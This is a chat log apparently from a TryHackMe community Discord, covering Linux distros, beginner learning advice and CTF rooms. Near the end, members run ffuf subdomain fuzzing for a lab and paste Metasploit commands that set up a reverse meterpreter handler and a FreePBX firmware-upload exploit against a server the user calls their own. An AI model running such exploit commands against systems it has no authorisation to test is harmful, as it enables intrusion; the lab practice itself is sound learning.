#general

1 messages ยท Page 2318 of 1

glacial berry
#

Just got vencord

#

This is awesome

blissful current
#

wot for?

glacial berry
blissful current
#

lol

glacial berry
#

I can pet anything now cursed

blissful current
glacial berry
#

I got an idea

glacial berry
blissful current
glacial berry
#

Well, lunch time

#

Gonna go to canteen

#

Will be back

#

Soon

blissful current
#

lunch time as well

glacial berry
#

Mmm

stoic quarry
#

Yum

blissful current
fading perch
#

has anyone ever used an IMSI catcher?

stoic quarry
twin ridgeBOT
#

Gave +1 Rep to @grizzled anchor (current: #3672 - 1)

fading perch
mental spoke
#

LMAOOO github WANTS ME TO DO THIS 10 TIMES?! \

#

what kinda troll ass shit is this

signal ingot
mental spoke
#

none nada zip zero

#

how do they expect me to solve this one

stoic quarry
mental spoke
#

this system has GOT to be built by a troll

stoic quarry
#

Github innit

mental spoke
#

omggg i got one of the 10 wrong and now i have to do 10 more LMAOOO

stoic quarry
#

Godspeed grandma

mental spoke
#

yeah this is CURSED

#

im straight up just not gonna do it

#

rip

stoic quarry
#

Mmhm

#

Complain to github lol

#

They probably won't do anything

mental spoke
#

they wont. even tho thats absurd and nearly impossible to do correctly because the imgs render all broken

#

imma try to signup on my phone

stoic quarry
#

Don't they have SSO with Microsoft accounts

mental spoke
#

if you use microsoft yes

#

rip its doing it to my phone too they prob flagged my ip. im absolutely not doing that puzzle rn

stoic quarry
#

Good luck next time ig

mental spoke
#

i lied i did it and got a failed to create account issue

#

lovely.

narrow yew
#

lies and lies

stoic quarry
#

And more lies

queen flare
#

How do you guys use RFCs for learning about something? Do you guys read them cover to cover or only look into them if u can't find something elsewhere or just google and look other less complicated articles about the topic?

cosmic saddle
#

guys i have no background in cybersecurity i just signed up for thm where and what should i start with?

cosmic saddle
#

ok so what should i start learning

sturdy sequoia
#

scroll up

#

read the link i sent

lucid pumiceBOT
#

:hammer: eyesprep0720#0 has been banned.

cosmic saddle
#

what do i type here i said cybersecurity and it says its wrong

narrow yew
#

and then read the question

cosmic saddle
mortal sparrow
cosmic saddle
#

i am still new so i have no background on anything

narrow yew
#

I thougt you were still in school

cosmic saddle
narrow yew
#

Not you, the Yon guy taking a piss on Soc analyst's

#

while not having a job, the irony

cosmic saddle
#

or what to do

mortal sparrow
mortal sparrow
narrow yew
#

Did you not write the other day you were studying from home

mortal sparrow
#

Ain't u got sum better to do than to be a prick?

mortal sparrow
#

It's a thing in these days

cosmic saddle
#

ok i will just learn pen testing sounds more fun tbh

narrow yew
mortal sparrow
cosmic saddle
narrow yew
#

You will learn it on the path to SOC also

cosmic saddle
#

should i leanr any coding languages too?

narrow yew
#

For you personally sure, coding needed for SOC you will learn anyways

#

queries, pulling data, building playbooks etc

stoic quarry
#

That and you're more likely to get a SOC job than a Pentesting job

#

Pentesting is definitely sexier and is what people think of when you say you work in cybersecurity, but most businesses need defending

#

Pentests for Audits are nice but depending on where you are those will usually be annually and done by an external contractor

narrow yew
#

Thanks @stoic quarry

twin ridgeBOT
#

Gave +1 Rep to @stoic quarry (current: #99 - 110)

stoic quarry
#

Uh

#

Np!

#

It's good to know how pentesting works for sure tho

narrow yew
#

Good analysis as always

#

Just wish the youngsters would listen to you

stoic quarry
#

Pentesting looks sexy

#

A tiktok video of someone rooting a machine gets more views than someone going through pcaps to find which IP is conducting a port scan y'know

blissful current
blissful current
stoic quarry
#

It's commonly that aye

blissful current
narrow yew
#

And they get upset when you call them out ๐Ÿ™‚

#

so fast

stuck ridge
#

My government made a laws when ads have to skipable after 5 secs

stoic quarry
#

Based

stuck ridge
#

And yall are not

stoic quarry
#

?

#

You don't know where I live

mental spoke
#

setting up depencencies for a build on win11 may be my 13th reason

#

windows can actually eat my shit.

#

im so done with it. microslop can go die

stoic quarry
#

How are you installing it?

mental spoke
#

chocolatey and having to deal w cmake

#

im just over it. windows genuinely sucks. if i was using linux i would have been done 30 mins ago.

stuck ridge
stoic quarry
#

Do you build them often? If so just write a script to do it all so you can scale easier

mental spoke
stoic quarry
#

Lmao

mental spoke
#

MSVC just has a load of nonsense

stoic quarry
#

Lmao

mental spoke
#

installed the 2022 community tools, watched the package break itself and im abt to take my windows m.2 and burn it in a fire

#

i will attempt to migrate to using that instead because yeah this is a massive headache like genuinely

stoic quarry
#

Hate it lol

#

Who stares at their desktop all day

stoic quarry
#

Too confusing

#

Gave up

mental spoke
#

im doing all of this just to get a build going on a stupid ass software

#

"just install the dependencies"

#

install my foot into your rear

#

they did but because im modifiying the fork ill need to be able to build it myself

#

100% agreed there

#

would be wayyy better

#

This better save the day

stoic quarry
#

It's MS

mental spoke
#

i have such a huge project ahead of me and im over here getting choked out by some dependencies

#

good point ๐Ÿ˜ญ

#

mm rust

#

rust makes things sm easier. its efficient

#

my project will take months and thats if i can even properly pull it off, ill need collaborators over time

#

thank you its all a static html file LOL

#

not today LOL. skipping the framework stack to focus on actually building technical documents for this project

#

I need to go and place an order for a New raspberry pi 5 and another pico and a MCP4728 I2C DAC breakout board and a few other things

worldly pollen
#

I have some question abt security enginner role who can help me

worldly pollen
#

try to use torbrowser but make sure to stay secure

#

and u can also combinate with tails

stuck ridge
#

Why do you need?

worldly pollen
#

hiddenwikki

stuck ridge
#

You arent going there just to take 2 screenshots and scare your friends

#

-# the fact that there isnt any website there

#

The darkweb isnt for curiosity. It is too dangerous

worldly pollen
#

if u are gonna do that lemme know I wanna see them

stuck ridge
#

Your information, everythings.

#

Wdym

#

Only enter the darkweb with a popurse

#

Yes.

#

It is very scary.

#

You shouldn't go in there.

#

Darkweb.

#

Even we are scare of the darkweb. The ethical hackers you know.

#

You shouldn't go there.

#

I bet it is not your real address dang

stoic quarry
#

๐Ÿค“

stuck ridge
#

Never. It is very scary.

#

It is the most deepest area in the internet. You shouldn't never go there.

stoic quarry
#

Why

stoic quarry
#

For what

stuck ridge
#

NO, never.

faint vigil
stoic quarry
#

What fun

stuck ridge
#

DONT EVER go there

stoic quarry
#

There isnt much "fun" to be had lmao

faint vigil
#

Should I stick with windows 11 or try Ziron?

stuck ridge
#

NOONNOBOBOOB

#

DONT

#

DONT

#

แปคg

stoic quarry
stuck ridge
#

Actually it isnt that scare bruh

stoic quarry
#

Windows is fine

faint vigil
stoic quarry
#

Windows probably best

faint vigil
#

so Vms sometimes

stoic quarry
#

I'd recommend having a Linux VM so you can learn tools properly

faint vigil
stuck ridge
#

It is not that scare bruh, just get full opsec, dont click on random links, do not download anything, use vpn and tor and you r good

faint vigil
#

I'll just install it on my other pc that already has mint lol

mental spoke
#

dont worry im still at it trying to get this build to work

stoic quarry
#

Use a VPN and tor

Bruh

stuck ridge
#

Also, there isnt any "organs seller" or "red room" on there, they r all fake or creepy pasta

mental spoke
#

ahh yes the ppl that think using TOR with a VPN is a good idea

stuck ridge
#

But u might find scary website that only used to scare you ahh

#

Btw, u might find some criminals markets in there, which sell drugs or exploits

mental spoke
#

Never use a VPN with tor at the same time.

stoic quarry
#

Depends if you trust exit nodes

stuck ridge
#

And if you found an exploit abt discord. Remind us :))

stuck ridge
stoic quarry
#

Some vpn providers won't let you anyway

stuck ridge
#

Welp, also if you want more opsec. Use vm

stoic quarry
#

Uh

mental spoke
# stuck ridge Why?

A few major reasons. Tors design philosophy is built around eliminating the need for any single trusted entity. when you add a VPN you reintroduce that. and ontop of that your vpn provider sees you are connecting to tor and knows your real ip. you replaced your ISPs visibilty with the vpns and thats actually a worse trade most times since ISPs are regulated and vpns lie about logging. and if the VPN is subpoenaed or compromised your exposed. and ontop of that you gain almost nothing. theres really no good trade off for it and you increase your attack surface

stoic quarry
mental spoke
#

i keep trying to use Ctrl + alt + T on windows and im losing my mind

stoic quarry
#

You can use a VM and have 10+ proxies, but if you post "Hey guys I live in X city" then you have shit OPSEC no matter how complicated you made your setup

mental spoke
#

im so used to linux atp

stoic quarry
#

Auto hotkey still the usual one?

#

I forgot what windows users need for keybinds

mental spoke
#

ill end up using razer synapse in my case because it allows custom macro creation

#

but auto hotkey is a good choice still

stoic quarry
#

Fair

mental spoke
#

esp for ppl without keyboard software

#

i love the linux community. razer decided to not make linux support so they went and reverse engineered synapse and made an open source fork of it and made the hardware detectable in custom applications easier

#

and its WAY better than razers dookie windows software

stoic quarry
#

Oh really? That's sick

#

Love FOSS communities

mental spoke
#

yes its actually awesome. its a lot faster than razers setup and they removed all the bloat and bs

stoic quarry
#

I have Razer stuff but don't really care about making my keyboard go red yk

#

And KDE has easy keybinds

mental spoke
#

i completely understand that tbh, i use it because i have a 60% and need to add certain macros to spots for keys im missing or i use to to change my dpi

#

KDE is amazing for that

stoic quarry
#

True. Mind sending me a link? I need to adjust the DPI lmao

mental spoke
#

my main distro i use is KDE and arch based

stoic quarry
#

My mouse is either slow, fast, too fast, way too fast, or stupid fast

mental spoke
#

yay -S razergenie < this is the gui for the driver

#

or sudo apt install razergenie if debian

lucid pumiceBOT
#

:hammer: tet_66#0 has been banned.

mental spoke
#

he got snipped rq

stoic quarry
twin ridgeBOT
#

Gave +1 Rep to @mental spoke (current: #761 - 10)

sturdy sequoia
#

+rep @cloud quiver

twin ridgeBOT
#

Gave +1 Rep to @cloud quiver (current: #1 - 6130)

mental spoke
#

make sure to add yourself to plugdev or things wont work sudo gpasswd -a $USER plugdev

#

if you have issues just ask claude to help you install it, super easy and takes like 5 commands max to get it all working

#

you can also just use polychromatic instead of razergenie

stoic quarry
#

I'll probs just read docs but cheers

mental spoke
#

just easier for some ppl to do that then read docs, if youre comfortable with computers docs are no issue

stoic quarry
#

I also just don't like LLMs lol

mental spoke
#

completely understandable

stoic quarry
#

Watched someone use Claude to find the average of 7 numbers yesterday

mental spoke
#

some ppl rely on it WAY to much and are gonna become braindead

stoic quarry
#

Truly a tool the likes of which haven't been seen before

weak rampart
stoic quarry
#

Yeah its nice

mental spoke
#

i use garuda linux and love it

stoic quarry
#

Neat

bold rover
#

@weak rampart sup ๐Ÿ‘‹

mental spoke
#

I wanna mess with this flavor of garuda but havent yet

mental spoke
#

some ppl here would really dislike the flavor i daily tho LOL its really extra and colorful

bold rover
#

You like it

#

You use it

mental spoke
#

exactlyyyyyy

mental spoke
#

i enjoy it even tho its a bit heavy

weak rampart
#

I'm so hyped dude

bold rover
weak rampart
#

i met so many people

bold rover
weak rampart
#

met a dude from my country's national cyber team

mental spoke
#

its pretty fun. its a very clean distro theme wise and they did a great job

bold rover
weak rampart
bold rover
weak rampart
#

it's new to me

bold rover
weak rampart
#

yes

blissful current
fading perch
#

i want to be top 1

#

but, i'm lazy study

stoic quarry
#

Gl

mental spoke
#

after 2 hours of fighting dependencies i got the build complete... that took WAY too long holy

weak rampart
#

kde is great for colorful things

bold rover
mental spoke
#

Getting this built took 2 hours

#

time for sleep that was a headache

fading perch
bold rover
#

I will when I get back

#

Dm me

#

So I'll remember

bold rover
fading perch
fading perch
bold rover
#

Dm me

#

Or else I'll forget

#

Just say wallpaper

fading perch
bold rover
#

-# help me

rocky night
fading perch
bold rover
#

Hope she's fine

fading perch
#

RIP Snowie

sick lance
#

@brisk tree Fucked off back home yet?

bold rover
bold rover
bold rover
fading perch
#

I will beat 0day

bold rover
#

I believe you

quick blaze
#

@hasty sand what do you think?

bold rover
quick blaze
sick lance
#

..For pinging Skidy?

#

Lol.

quick blaze
weak rampart
sick lance
bold rover
bold rover
quick blaze
#

Interesting.

bold rover
#

Must be him

sick lance
#

I see @lone thistle is back on the mod team.

bold rover
#

Damn

#

Gotta keep a eye out

bold rover
weak rampart
#

gui?

bold rover
weak rampart
#

hyprland okay

#

thanks

bold rover
#

Cool

weak rampart
#

nevermind, i might use it when i eventually switch to arch though

quick blaze
weak rampart
#

my linux mint would never

sick lance
#

People who use Arch aren't hackers.

#

They're too busy customising their GUI and telling people they use Arch, to actually do any hacking.

weak rampart
bold rover
sick lance
#

Why fix something that isn't broken.

weak rampart
#

or you don't care about these stuff

sick lance
quick blaze
sick lance
bold rover
quick blaze
sick lance
#

You have Purple Kali.

bold rover
#

Bro

bold rover
quick blaze
#

๐Ÿค”๐Ÿ˜ฒ

bold rover
#

Details matter

quick blaze
#

First I'm hearing of it...

#

What's the difference

bold rover
bold rover
quick blaze
bold rover
#

I guess

weak rampart
# sick lance Wdym?

i was trying to ask, do you care if it comes pre installed with all the 50 tools or would you prefer it to come as minimal as possible (aka clean) and you install only what you need

bold rover
sick lance
#

Then my own, and other tools which doens't come in Kali.

sick lance
#

It's a Kali release with more blue tools than normal Kali.

bold rover
#

It's perfect for bleu

quick blaze
# bold rover Ohh i see

I do everything on remnux, unless it's disk forensics or windows file analysis or crazy windows log analyss, zimmerman toolkit and stuff like autopsy helps out a lot here.

#

I hate windows log analysis but meh.

stoic quarry
#

Kali Purple didn't have curl on release didnt it?

#

Or wget

quick blaze
twin ridgeBOT
#

Gave +1 Rep to @sick lance (current: #2 - 3970)

stoic quarry
#

Something super basic

sick lance
#

๐Ÿ™‚

#

I use AB wallpaper too.

bold rover
stoic quarry
#

Lmao

quick blaze
bold rover
bold rover
stoic quarry
bold rover
#

Just give it a try

#

See how it feels

quick blaze
#

I land back home in 9 hours...got two days to prep for a CTF first and then I'll see.

stoic quarry
#

Hell yeah

quick blaze
sick lance
#

Kek

bold rover
#

Rest well

bold rover
quick blaze
#

Honestly fair. Niki Lauda used to say that he had a great ass, that's why he felt the car components and the way it drove.

quick blaze
#

We should be having good balls to know what tools tingle em good or not innit.

quick blaze
bold rover
copper flame
bold rover
#

Liked his movie

quick blaze
copper flame
quick blaze
#

You too?

#

I'm also a huge Ferrari/Italy guy so Antonelli in Merc makes it even better for me. :)

stoic quarry
#

Suzuki swift rise up

quick blaze
#

The depression.

weak rampart
#

yeah until someone offers you one free

quick blaze
#

๐Ÿ˜ญ.

#

Oh damn.

#

Sounds strange, the 488 has a pretty reliable engine, shares it with other variants too.

#

Gearbox is good too.

#

What's it been in the workshop for all those times?

#

This is bullshit.

#

I will not take this disrespect. Fucking lambos.

#

He might've gotten a bad model? could just talk to Ferrari about it? Has he done that yet?

stuck ridge
#

I feel so burn out

quick blaze
#

Weird. 488 doesn't have many reliability issues.

#

AMG GTs are super nice yeah.

#

Honestly I like the c8, looks nice!

#

Yuuurrrr.

#

They're not as expensive as the AMG GTs or 911s too.

#

But I still like me some Merc/Ferrari

#

True true. ๐Ÿ˜†

stuck ridge
#

THE ESCALATION MODULES IS F*CLING TORTURE

quick blaze
#

๐Ÿ‘€

stuck ridge
quick blaze
topaz steeple
#

Uh so there is a war goin on?!

#

๐Ÿ’€

quick blaze
#

Politics out of here.

#

About to ping the mods...

stuck ridge
eager marsh
quick blaze
topaz steeple
bold rover
eager marsh
stuck ridge
#

I cannot sit here and read information anymore๐Ÿ˜ญ Im need a CTF..I NEED A CTF HAHAHADKSKAJ

oak river
#

How's everyone today?

bold rover
stuck ridge
#

IM GOING CRAZY

oak river
#

Get some Menthyl isovalerate

quick blaze
#

DiceCTF.

#

Have fun.

stuck ridge
quick blaze
acoustic crystal
sick lance
hallow hazel
#

hi scrubz

sick lance
#

Hai

hallow hazel
#

what's up on this fine thursday

stuck ridge
sick lance
#

A platform you can download VMS from, taken over by htb

oak river
# stuck ridge What is that

Virtual machines that are ready to be deployed through something like Oracle Virtualbox and you are supposed to use your knowledge to get a flag/file/access or full control at the target machine

sick lance
#

You'll find a few of the machines on them on there.

stuck ridge
#

Can i do it on my homelab?

oak river
oak river
stuck ridge
oak river
#

I haven't really done anything on vulnhub but you should be able to, there are guides

sick lance
stuck ridge
#

If they can they can

oak river
#

Never had done it before, but once I sat I did it

#

for the first time ever with chatgpt lol

#

Hiren'S boot

sick lance
#

If you're like me, you'll learn more about yourself failing, than you will being successful.

oak river
#

If we didn't fail we wouldn't be able to succeed

sick lance
stoic quarry
#

Best way to learn is to try and fail

#

Then learn why you failed

oak river
#

Lately I feel very tired of theory to be fair

bold rover
#

Then learn how you failed

#

Then learn what failed you

stoic quarry
#

Go slightly deeper than what you know and you'll learn faster than sticking in the stuff you're comfortable with

eager marsh
stuck ridge
#

Finally...

sick lance
stuck ridge
stoic quarry
#

Time to wash cars until you get money ig

stuck ridge
bold rover
stuck ridge
#

My goal is achieved...

#

I can finally call myself a hacker๐Ÿฅน

tame axle
#

hello ppl

oak river
#

Going for a lunch break, brb

tame axle
tame axle
bold rover
#

Tell me

#

No using online sources, be true to yourself

stuck ridge
# bold rover Tell me

Uhm uhmmm, first uhmm get the- the payload? Oh nah get the shell on - on target with privilege user and then then execute the payloads. And use a uhm and uhm wait no uhmmm

#

Jk

bold rover
#

Go study more

stuck ridge
agile topaz
stoic quarry
#

Bro is gatekeeping in the TryHackMe discord

stoic quarry
weak rampart
weak rampart
#

is a streamer

#

named caseoh

stoic quarry
#

Okay

weak rampart
#

you don't know him?

stuck ridge
stoic quarry
#

Nope

weak rampart
#

I'd be more worried about DrOPSEC

stuck ridge
#

I ddosed 67 people, google, cloudflare, etc๐Ÿ˜ˆ

sick lance
weak rampart
stuck ridge
weak rampart
#

i mean I don't know

stuck ridge
weak rampart
#

lowkey yeah

#

if he was actually active and not just troll alt account he'd just block me lowkey

sick lance
#

Because that would make it better...

weak rampart
#

yeah

#

bro you can't say his account is made seriously

#

that's obviously a joke account

sick lance
#

Doesn't mean they deserve to be pinged 2-4 times a day. ๐Ÿ˜…

weak rampart
#

i like pinging him, he's funny

stuck ridge
#

Should i make an account for you to ping?

weak rampart
#

no

stuck ridge
#

Ok

weak rampart
#

i want iphacker specifically

sick lance
#

Oh, so it's almost like low key bullying, I get it.

#

Keep doing you.

stoic quarry
#

You'd be surprised what watching 1 episode of Mr. Robot will do to you

weak rampart
#

i don't bully people

stuck ridge
stoic quarry
#

I don't understand half of that

stuck ridge
glacial berry
sick lance
stoic quarry
#

๐Ÿš†

stuck ridge
mortal sparrow
#

did someone manage to do the takeover box lately?
https://tryhackme.com/room/takeover

โฏ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
  -H "Host: FUZZ.futurevera.thm" \
  -u https://futurevera.thm \
  -k -fw 1511 -fs 4605 \
  -o takeover.json -of json

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://futurevera.thm
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.futurevera.thm
 :: Output file      : takeover.json
 :: File format      : json
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 4605
 :: Filter           : Response words: 1511
________________________________________________

:: Progress: [100000/100000] :: Job [1/1] :: 578 req/sec :: Duration: [0:03:00] :: Errors: 0 ::

like tf?

TryHackMe

This challenge revolves around subdomain enumeration.

sick maple
sick lance
#

Choo choo

finite basalt
#

We got tryhackme HS2 before we got HS2 ๐Ÿ˜ฎโ€๐Ÿ’จ

mortal sparrow
#

i need help ๐Ÿ˜ญ

sick lance
mortal sparrow
#

its not looking its output

sick lance
#

Tried a different directory list?

sick lance
mortal sparrow
#

even rockyou at some point

sick lance
#

Rockyou is a password file?

#

Lmao.

mortal sparrow
#

I KNOW AND I STILL TRIED IT

sick lance
#

One moment.

finite basalt
#

Are you saying there's nothing found inside the json output?

mortal sparrow
#

there's output but no hits
it wouldve shown on the term too

finite basalt
#

is there a dns server for the box that you query?

sick maple
mortal sparrow
#

there's this in one of the writeups.
I dont understand how he came into that conclusion

finite basalt
tame moss
#

I believe you have to manually enumerate instead of using ffuf or other tools

sick lance
mortal sparrow
sick lance
mortal sparrow
#

that's fucking cap bro
what????
why did it work for u and not me?

sick lance
#

Add in -u https://10.10.125.247

finite basalt
#

Yeah I wonder if it's struggling with resolving the IP from hosts maybe

sick lance
#
ffuf -u https://10.10.125.247 -fs 0,4605 -H "Host: FUZZ.futurevera.thm" -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
#

@ocean wasp May I help you?

finite basalt
#

I assume it's because it's sending the requests from the host you define rather than the fuzzed host (in terms of headers)?

finite basalt
mortal sparrow
finite basalt
#

yeah I'm guessing it's a header thing maybe?

mortal sparrow
#

yeah I got 2 bingos, blog and support

pure steeple
#

ffuf doesnโ€™t set headers automatically, this has bitten me in the past

mortal sparrow
#

it is an issue with resolving the url

sick lance
mortal sparrow
#

can u explain im geniouly curious

#

how do u spell that work?

pure steeple
#

-H is for header

finite basalt
#

Yeah that was my guess was that it was sending direct to the "mailbox"

mortal sparrow
urban ravine
#

I just across something that personally I think is insane. I was trying to find an old friend of mine. All I did was give google ai a couple pieces of information and it gave me her whole back story and what area sheโ€™s from. Obviously I know where sheโ€™s from but ๐Ÿ‘€ I dunno. It rubs me the wrong way.

sick lance
pure steeple
mortal sparrow
pure steeple
#

Server may be configured to catch all urls (with a wild card) and redirect to a single pattern?

mortal sparrow
#

idk seemed abit off
never encountered it before

pure steeple
#

Creator might have wanted to make the fuzzing a bit more of a challenge

#

People might do it to avoid broken links, for weird search engine optimization purposes

pure steeple
#

lucky for you, you get to practice your filtering

tame axle
#

guys my school asked to make a cv because we have smth called work experience and i put my skills dose it look alr ? pls dont flame me

wet eagle
pure steeple
#

Have you actually done red teaming?

tame axle
mortal sparrow
#

@sick lance lolz

pure steeple
#

offensive security ( then give details )

twin ridgeBOT
#

Gave +1 Rep to @pure steeple (current: #136 - 77)

pure steeple
#

What are you referencing with "permission-based"?

wet eagle
#

Perhaps he didn't want to sound like a black hat

tame axle
pure steeple
tame axle
#

oh alr thx

pure steeple
#

Better to give examples of which offensive security areas you have skills in

#

Whether it is web, active directory, network/MITM, wireless, malware etc etc.

stuck ridge
#

"Can you hack this account for me?"
"sorry, i only master osint"

twin ridgeBOT
#

Gave +1 Rep to @pure steeple (current: #134 - 78)

stuck ridge
wet eagle
#

Guys I have a question that I hope you could help me with, I was wondering with what language should I start with? Python 3 or C++? Thanks!

pure steeple
#

nah, C

stuck ridge
#

It is the easiest language and the most common know to beginner

pure steeple
#

go do CS50

wet eagle
#

hmm

tame axle
stuck ridge
wet eagle
#

I'm pretty much a beginner after all

pure steeple
stuck ridge
tame axle
pure steeple
#

C

#

Cccccccccccccc

#

Look I can type mine more

#

That means I'm right

wet eagle
#

couldnt I just learn both ? ๐Ÿค”

#

Or is that way too ambitious

pure steeple
#

CS50 teaches C to start and moves into Python

tame axle
# pure steeple C

bro C takes time i lost so much of hair learning that and i still cant program it properly

wet eagle
#

Okayy

tame axle
#

its free and useful for the basic understanding

pure steeple
#

compsci is the foundation of compsec

wet eagle
#

what's the difference between a degree in computer science and some tinkerer/bounty hunter? ๐Ÿค”

tame axle
#

finna go bald by 18

stuck ridge
#

Malware analyse

wet eagle
pure steeple
#

AI already took your job, enjoy your retirement at 18

stuck ridge
#

Welp

wet eagle
twin ridgeBOT
#

Gave +1 Rep to @stuck ridge (current: #500 - 16)

tame axle
wet eagle
#

?

pure steeple
#

we're in TryHackMe, house of the AI, you must say yes

stuck ridge
# wet eagle Oh okay, thx!

You can go bug bounty if you have enough knowledge to find a bug and the company will pay for you if the bug is valid.

tame axle
stuck ridge
pure steeple
#

I like C to start because it is lower level and gives students practice with concepts like memory, pointers, a compiler etc. You need to understand how computers work to break them. I'm not saying you need to know C in detail or spend more than 2-3 weeks. You can move to a higher level language like Python. But they designed the learning path in CS50 intentionally, and it is very successful.

stuck ridge
#

-# dont tell anyone this

wet eagle
#

is it hard to be a bug bounty? I mean is it necessary to have a degree or is it sheer practice? I was thinking about doing so

tame axle
wet eagle
pure steeple
#

barf

stuck ridge
wet eagle
pure steeple
stuck ridge
#

I dont need a job :))

stuck ridge
#

Im still a teenager

#

And only job i can do is bug hunter

wet eagle
stuck ridge
pure steeple
wet eagle
tame axle
stuck ridge
#

-# jk it is nmap

wet eagle
#

๐Ÿ˜ญ

#

Everytime I try nmap it just keep failing

#

It shucks:((

paper kettle
#

hey is it normal that in this room
https://tryhackme.com/room/winadbasics
There's ALWAYS someone logged on Sophie's Desktop and I cant get Flag from it? its task 4 and I've been waiting for like an hour now

tame axle
stuck ridge
pure steeple
wet eagle
#

wut that mean?

wet eagle
stuck ridge
pure steeple
stuck ridge
#

Or a fridge

tame axle
agile topaz
wet eagle
stuck ridge
wet eagle
stuck ridge
agile topaz
# wet eagle Okayy!!

But honestly a real hacker could still hack you with a potato laptop if they have the skills

stuck ridge
#

Or smart toaster

wet eagle
#

is you're a tinkerer is it necessary doing root or with doing proot is just enough?

pure steeple
#

nah, can't hack me, I run bsd v1.0, patched

wet eagle
stuck ridge
#

What is tinkerer?

wet eagle
#

how do I explain it

#

uhm

pure steeple
#

A tinker is
a person who makes minor, often experimental repairs on mechanical or household items, or an archaic term for an itinerant mender of pots and pans. As a verb, to tinker means to fix, adjust, or experiment with something in a casual, aimless, or sometimes unskillful manner.

agile topaz
boreal scarab
pure steeple
#

@cosmic pendant

#

ha same thoughts

boreal scarab
cosmic pendant
#

I've hacked coffee pot before

wet eagle
#

:0

stuck ridge
pure steeple
#

do it now b/c I need it to give me more coffee

tame axle
wet eagle
#

Also one question

#

why is Kali so important for you when talking about hacking?

#

๐Ÿค”

stuck ridge
pure steeple
#

it's just convenient, it has lots of tools pre-installed

stuck ridge
#

And it is designed to hack

agile topaz
stuck ridge
#

Only...to hack

wet eagle
#

no sudo apt install needed?

stuck ridge
#

You cannot use it for daily use, its repo only have tools

wet eagle
#

Oo

tame axle
#

i thought of adding sound effects to the typing

pure steeple
boreal scarab
stuck ridge
agile topaz
tame axle
#

ah alr

cosmic pendant
wet eagle
#

can I hack a lightbulb like in watchdog2? ๐Ÿค”

stuck ridge
stuck ridge
tame axle
#

currently outa 10 how much would you give it

stuck ridge
#

You can exploit its firmware and get in

bold rover
wet eagle
#

Okay!

stuck ridge
pure steeple
#

Just do what you want to do, there are very few absolutes

stuck ridge
#

Yea

agile topaz
stuck ridge
agile topaz
#

Imagine coming to work and instead of a keycard you run a quick exploit

wet eagle
#

what does it mean when something is open source?

agile topaz
stuck ridge
#

Anyone can access it

pure steeple
#

Also, the public community maintains it and makes updates to it

stuck ridge
#

A closed source mean you only have the .exe or binary files, you cannot access the source

twin ridgeBOT
#

Gave +1 Rep to @stuck ridge (current: #483 - 17)

tame axle
#

just a blog

pure steeple
#

its about hacking coffee pots

#

kind of

tame axle
#

im still making it

agile topaz
wet eagle
#

why do many people here use linux rather than maybe windows or macOS?

stuck ridge
acoustic crystal
#

bashzoom sup

stuck ridge
#

Open source + there are many distros

agile topaz
tame axle
wet eagle
#

Ooo

pure steeple
wet eagle
#

does that also make Linux better for daily use?

stuck ridge
#

If you want minimalist, arch. If you want daily use, ubuntu. If you want hacking, kali, parrot, etc

soft pike
#

Im having a hard time trying to run a module in metasploit. Can someone help me? can pay 5$usd lol

agile topaz
stuck ridge
pure steeple
stuck ridge
tame axle
wet eagle
pure steeple
stuck ridge
pure steeple
#

Debian is just debian

agile topaz
wet eagle
#

what does that mean?

agile topaz
#

8/10

wet eagle
#

ahh

stuck ridge
tame axle
coarse hedge
#

Thanks, you guys are kind

wet eagle
#

how do y'all not get hacked? ๐Ÿค” What methods may I ask you guys might use?

pure steeple
#

pro tip: never trust links from anyone above 0xD rank

soft pike
stuck ridge
pure steeple
stuck ridge
#

And also, make your password as long as u can remember it

pure steeple
#

Quit League of Legends

soft pike
#

freepbx, I want to check if my server has been patched since updated.

wet eagle
twin ridgeBOT
#

Gave +1 Rep to @stuck ridge (current: #463 - 18)

pure steeple
#

in fact, just quit the internet and go start a small farm

bold rover
coarse hedge
wet eagle
stuck ridge
wet eagle
tame axle
wet eagle
#

but I feel like it's gonna be a rickroll

#

Is it?

stuck ridge
wet eagle
#

heh, I knew it!!

pure steeple
coarse hedge
bold rover
stuck ridge
#

Any request go to that subdomain of thm will get redirect to a 4k, clear version of rickroll

wet eagle
soft pike
agile topaz
pure steeple
#

and make sure RHOST and LHOST are different ... right now from your output they look the same?

wet eagle
#

guys what was nmap for? How may I use it? I just wanna explore my own router

pure steeple
#

Nmap ("Network Mapper") is a free, open-source tool used for network discovery, security auditing, and inventory management. It scans networks to identify active hosts, open ports, available services (application name/version), and operating systems. Cybersecurity professionals use it to detect vulnerabilities and monitor network uptime.

soft pike
pure steeple
#

You're saying HOST stuff but giving PORT numbers. Does not compute.

wet eagle
#

what's that?

soft pike
#

Okay, let me explain better. I set up my localhost + port like this:

msf > use /exploit/multi/handler
[] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.0.0.18
LHOST => 10.0.0.18
msf exploit(multi/handler) > set LPORT 444
LPORT => 444
msf exploit(multi/handler) > exploit
[
] Started reverse TCP handler on 10.0.0.18:444

And rhost is running on port 443 example ip:443

wet eagle
#

Okay

quick blaze
#

Err....what?

wet eagle
#

Does anyone know why is nmap not working here? I must be horrible doing this ๐Ÿ˜ข

#

wat?

#

๐Ÿ˜ญ

pure steeple
#

just do nmap 192.168.0.1 to start

wet eagle
#

Okay I will try that!

gloomy stag
soft pike
# pure steeple RHOST is missing

Im setting rhost correctly.

msf exploit(unix/http/freepbx_firmware_file_upload) > set LHOST 10.0.0.18
LHOST => 10.0.0.18
msf exploit(unix/http/freepbx_firmware_file_upload) > set LPORT 444
LPORT => 444
msf exploit(unix/http/freepbx_firmware_file_upload) > set USERNAME admin
USERNAME => admin
msf exploit(unix/http/freepbx_firmware_file_upload) > set RPORT 443
RPORT => 443
